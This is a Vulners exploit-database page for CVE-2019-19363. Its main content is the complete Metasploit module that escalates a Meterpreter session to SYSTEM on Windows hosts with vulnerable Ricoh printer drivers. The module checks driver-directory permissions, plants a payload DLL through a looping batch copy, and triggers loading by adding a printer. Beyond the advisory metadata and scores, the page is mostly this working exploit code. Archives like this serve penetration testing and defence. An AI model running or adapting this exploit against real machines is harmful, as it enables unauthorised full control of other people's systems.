Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Ricoh Driver - Privilege Escalation (Metasploit)

🗓️ 10 Feb 2020 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 250 Views

Ricoh Driver Privilege Escalation on Window

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Ricoh Printer Drivers - Local Privilege Escalation Exploit
22 Jan 202000:00
zdt
0day.today		Ricoh Driver - Privilege Escalation Exploit
10 Feb 202000:00
zdt
ATTACKERKB		CVE-2021-34481
16 Jul 202100:00
attackerkb
ATTACKERKB		CVE-2019-19008
21 Feb 202609:29
attackerkb
Circl		CVE-2019-19363
24 Jan 202009:04
circl
CNVD		Multiple RICOH Printer Driver Elevation of Privilege Vulnerabilities
25 Feb 202000:00
cnvd
CVE		CVE-2019-19363
24 Jan 202017:12
cve
Cvelist		CVE-2019-19363
24 Jan 202017:12
cvelist
Exploit DB		Ricoh Printer Drivers - Local Privilege Escalation
22 Jan 202000:00
exploitdb
EUVD		EUVD-2019-8984
7 Oct 202500:30
euvd
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ricoh Driver Privilege Escalation',
      'Description'    => %q(
        Various Ricoh printer drivers allow escalation of
        privileges on Windows systems.

        For vulnerable drivers, a low-privileged user can
        read/write files within the `RICOH_DRV` directory
        and its subdirectories.

        `PrintIsolationHost.exe`, a Windows process running
        as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
        during the installation of a printer. A user can
        elevate to SYSTEM by writing a malicious DLL to
        the vulnerable driver directory and adding a new
        printer with a vulnerable driver.

        This module leverages the `prnmngr.vbs` script
        to add and delete printers. Multiple runs of this
        module may be required given successful exploitation
        is time-sensitive.
      ),
      'License'        => MSF_LICENSE,
      'Author'         => [
                            'Alexander Pudwill',  # discovery & PoC
                            'Pentagrid AG',       # PoC
                            'Shelby Pace'         # msf module
                          ],
      'References'     =>
        [
          [ 'CVE', '2019-19363'],
          [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
        ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Platform'       => 'win',
      'Payload'        =>
      {
      },
      'SessionTypes'   => [ 'meterpreter' ],
      'Targets'        =>
        [[
            'Windows', { 'Arch'  => [ ARCH_X86, ARCH_X64 ] }
        ]],
      'Notes'          =>
      {
        'SideEffects' =>  [ ARTIFACTS_ON_DISK ],
        'Reliability' =>  [ UNRELIABLE_SESSION ],
        'Stability'   =>  [ SERVICE_RESOURCE_LOSS ]
      },
      'DisclosureDate' => "Jan 22 2020",
      'DefaultTarget'  => 0
    ))

    self.needs_cleanup = true

    register_advanced_options([
      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
    ])
  end

  def check
    dir_name = "C:\\ProgramData\\RICOH_DRV"

    return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)
    driver_names = dir(dir_name)

    return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") unless driver_names.length

    vulnerable = false
    driver_names.each do |driver_name|
      full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz"
      next unless directory?(full_path)
      @driver_path = full_path

      res = cmd_exec("icacls \"#{@driver_path}\"")
      next unless res.include?('Everyone:')
      next unless res.match(/\(F\)/)

      vulnerable = true
      break
    end

    return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable

    vprint_status("Vulnerable driver directory: #{@driver_path}")
    CheckCode::Appears('Ricoh driver directory has full permissions')
  end

  def add_printer(driver_name)
    fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)

    dll_data = generate_payload_dll
    dll_path = "#{@driver_path}\\headerfooter.dll"

    temp_path = expand_path('%TEMP%\\headerfooter.dll')
    vprint_status("Writing dll to #{temp_path}")

    bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
    cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
    bat_file = <<~HEREDOC
      :repeat
      #{cp_cmd} && goto :repeat
    HEREDOC

    write_file(bat_file_path, bat_file)
    write_file(temp_path, dll_data)
    register_files_for_cleanup(bat_file_path, temp_path)

    script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
    bat_cmd = "cmd.exe /c \"#{bat_file_path}\""
    print_status("Adding printer #{@printer_name}...")
    client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
    vprint_status("Executing script...")
    cmd_exec(bat_cmd)
  rescue Rex::Post::Meterpreter::RequestError => e
    e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
  end

  def exploit
    fail_with(Failure::None, 'Already running as SYSTEM') if is_system?

    fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'

    if sysinfo['Architecture'] != payload.arch.first
      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
    end

    @driver_path = ''
    unless check == CheckCode::Appears || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')
    end

    @printer_name = Rex::Text.rand_text_alpha(5..9)
    @script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"
    drvr_name = @driver_path.split('\\')
    drvr_name_idx = drvr_name.index('RICOH_DRV') + 1
    drvr_name = drvr_name[drvr_name_idx]

    add_printer(drvr_name)
  end

  def cleanup
    print_status("Deleting printer #{@printer_name}")
    Rex.sleep(3)
    delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
    client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Feb 2020 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 24.6
CVSS 3.17.8
EPSS0.03993
ricohprinterprivilege escalationwindowsnt authority\systemdllcve-2019-19363pentagrid agalexander pudwillshelby paceprintisolationhost.exeprnmngr.vbs
250